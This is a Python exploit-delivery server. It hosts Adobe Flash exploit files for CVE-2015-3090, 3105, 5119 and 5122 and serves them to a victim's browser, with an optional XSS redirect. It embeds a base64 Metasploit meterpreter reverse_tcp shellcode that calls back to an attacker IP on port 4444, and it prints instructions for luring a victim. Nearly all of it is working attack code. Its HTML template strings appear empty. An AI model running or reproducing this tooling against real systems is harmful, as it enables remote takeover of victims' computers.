#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import base64
# This script has been tested on:
# Windows 7 SP1 (x86), Firefox 38.0, and Adobe Flash 17.0.0.169 <- https://exploit-db.com/exploits/37368
# Windows 8.1 (x64), Firefox 38.0, and Adobe Flash 17.0.0.169 <- https://exploit-db.com/exploits/37368
# Windows 8.1 (x64), Firefox 38.0, and Adobe Flash 17.0.0.169 <- https://exploit-db.com/exploits/37448
# Modify the local server IP to host the web server and exploit files.
hostName = "192.168.1.100"
# Modify the local server port for the web server to accept connections.
serverPort = 8080
# XSS inject:
# If you need to use an XSS inject for this exploit, then set the xss variable to true.
# Setting xss = True -> request 1 = Javascript -> request 2 = HTML -> request 3 = swf file.
# Setting xss = False -> request 1 = HTML -> request 2 = swf file.
# Here is an example xss inject that has worked for me:
xssInject = ''
# Set xss to True if using xss.
xss = False
script = 'window.location.replace("http://' + hostName + ':' + str(serverPort) + '/execute");'
# Modify the base64Payload below to suit your needs.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
base64Payload = "/OiPAAAAYInlMdJki1Iwi1IMi1IUMf8Pt0omi3IoMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi0gYi1ggAdNQhcl0PDH/SYs0iwHWMcDBzw2sAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKgBZGgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V"
# Refer to exploit-db URLs for additional information.
# https://exploit-db.com/exploits/37368 -> CVE-2015-3090
# Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
# Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
# Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
# Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
# https://exploit-db.com/exploits/37448 -> CVE-2015-3105
# Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
# Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
# Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
# Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
# https://exploit-db.com/exploits/37523 -> CVE-2015-5119
# Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
# Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
# Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
# Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
# Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
# https://exploit-db.com/exploits/37599 -> CVE-2015-5122
# Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
# Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
# Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
# Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
# Windows 8.1, Firefox and Adobe Flash 18.0.0.203,
# Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
# Windows 8.1, Firefox and Adobe Flash 18.0.0.194
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
# Select the swf exploit file that corresponds with the adobe flash version running on the remote system.
swfFile = swfFileList['37368']
flashVarStr = ' '
embedStr = ' '
html = '''
''' + flashVarStr + '''
''' + embedStr + '''
'''
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == "/":
self.send_response(200)
self.send_header("Cache-Control", "no-cache, no-store")
if xss:
self.send_header("Content-type", "text/javascript")
else:
self.send_header("Content-type", "text/html")
self.send_header("Pragma", "no-cache")
self.end_headers()
if xss:
self.wfile.write(bytes(script, "utf-8"))
else:
self.wfile.write(bytes(html, "utf-8"))
elif self.path == "/execute":
self.send_response(200)
self.send_header("Cache-Control", "no-cache, no-store")
self.send_header("Content-type", "text/html")
self.send_header("Pragma", "no-cache")
self.end_headers()
self.wfile.write(bytes(html, "utf-8"))
elif self.path == "/msf.swf":
self.send_response(200)
self.send_header("Cache-Control", "no-cache, no-store")
self.send_header("Connection", "Keep-Alive")
self.send_header("Content-type", "application/x-shockwave-flash")
self.send_header("Pragma", "no-cache")
self.send_header("Server", "Apache")
self.end_headers()
msfswfFile = open(swfFile, "rb")
msfswfData = msfswfFile.read()
self.wfile.write(msfswfData)
if __name__ == "__main__":
webServer = HTTPServer((hostName, serverPort), MyServer)
print("Server started on http://%s:%s and hosting %s" % (hostName, serverPort, swfFile))
if xss:
print("Have the victim request a web page that includes the following XSS inject:")
print(" ", xssInject)
else:
print("Have the victim request the following web page:")
print(" http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")